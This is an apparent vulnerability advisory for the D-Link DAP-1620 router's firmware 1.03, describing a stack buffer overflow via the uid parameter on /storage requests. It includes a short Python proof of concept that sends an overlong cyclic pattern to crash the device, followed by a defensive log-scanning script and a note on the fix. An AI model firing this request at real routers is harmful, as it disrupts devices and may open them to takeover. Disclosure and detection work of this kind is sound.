| Firmware Name | Firmware Version | Download Link |
|---|---|---|
| DAP-1620 | DAP_1620_REVA_FIRMWARE_1.03 | https://legacyfiles.us.dlink.com/DAP-1620/REVA/Firmware/DAP-1620_REVA_FIRMWARE_1.03.B08.ZIP |
This vulnerability is triggered by a stack-based buffer overflow in the replace_special_char function, which causes the function to return to an abnormal address.

The router receives an HTTP request and calls the http_request_parse function. Within http_request_parse, the check_dws_cookie function is invoked at address 0x414BD0; it checks whether the request path starts with /storage and, if so, proceeds.

The check_dws_cookie function processes HTTP requests and checks whether the request path starts with "/storage". If it does, the function copies the uid parameter from the request into the 13-byte buffer uid_str without validating the length of the input. This can lead to a stack-based buffer overflow.

```python
import requests
from pwn import *  # provides cyclic()

# Target device as used in the advisory's test setup
ip = "172.17.0.3"
port = 80

# Path must start with /storage to reach check_dws_cookie; the uid parameter
# is copied into a 13-byte buffer, so a 100-byte cyclic pattern overflows it.
url = f"http://{ip}:{port}/storage?uid={cyclic(100).decode('utf-8')}?"

# The device may crash and not answer; any response text is printed as-is.
print(requests.get(url).text)
```
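From the defender's side, the condition described above (a request under /storage whose uid parameter exceeds the 12 characters that fit in a 13-byte buffer) is simple to detect in web-server or proxy logs. The following is an added example, not part of the original advisory; it assumes Common Log Format access lines, and the sample lines are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Buffer size stated in the advisory: uid is copied into a 13-byte uid_str,
# so anything longer than 12 bytes plus the NUL terminator cannot fit.
UID_STR_SIZE = 13
MAX_SAFE_UID_LEN = UID_STR_SIZE - 1


def uid_overflow_suspect(request_target):
    """Return (suspicious, longest_uid_length) for one HTTP request-target.

    Mirrors the code path in the advisory: only paths under /storage reach
    the vulnerable copy, and only the uid query parameter is copied.
    """
    parts = urlsplit(request_target)
    if not parts.path.startswith("/storage"):
        return False, 0
    # keep_blank_values so an empty uid= still counts as present
    params = parse_qs(parts.query, keep_blank_values=True)
    uids = params.get("uid", [])
    longest = max((len(u.encode("utf-8")) for u in uids), default=0)
    return longest > MAX_SAFE_UID_LEN, longest


def scan_access_log(lines):
    """Scan Common Log Format lines; return (target, uid_length) for flagged requests."""
    flagged = []
    for line in lines:
        # The request line is the first quoted field: "GET /path HTTP/1.1"
        try:
            request = line.split('"')[1]
            _method, target, _version = request.split(" ", 2)
        except (IndexError, ValueError):
            continue  # malformed line, skip it
        suspicious, length = uid_overflow_suspect(target)
        if suspicious:
            flagged.append((target, length))
    return flagged


# Constructed sample log lines (assumed format; not captured from a real device)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:00:00:00 +0000] "GET /storage?uid=abcdef123456 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:00:00:01 +0000] "GET /storage?uid=' + "A" * 100 + ' HTTP/1.1" 500 0',
    '192.0.2.12 - - [01/Jan/2024:00:00:02 +0000] "GET /index.html?uid=' + "A" * 100 + ' HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for target, length in scan_access_log(SAMPLE_LOG):
        print(f"possible uid overflow attempt: uid length {length} in {target}")
```

The same length check is the fix on the device side: the copy into uid_str must be bounded to 12 bytes (or the request rejected) before any data reaches the stack buffer.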

The vulnerability was discovered by Professor Wei Zhou's team (IoTS&P Lab) from the School of Cyber Science and Engineering at Huazhong University of Science and Technology.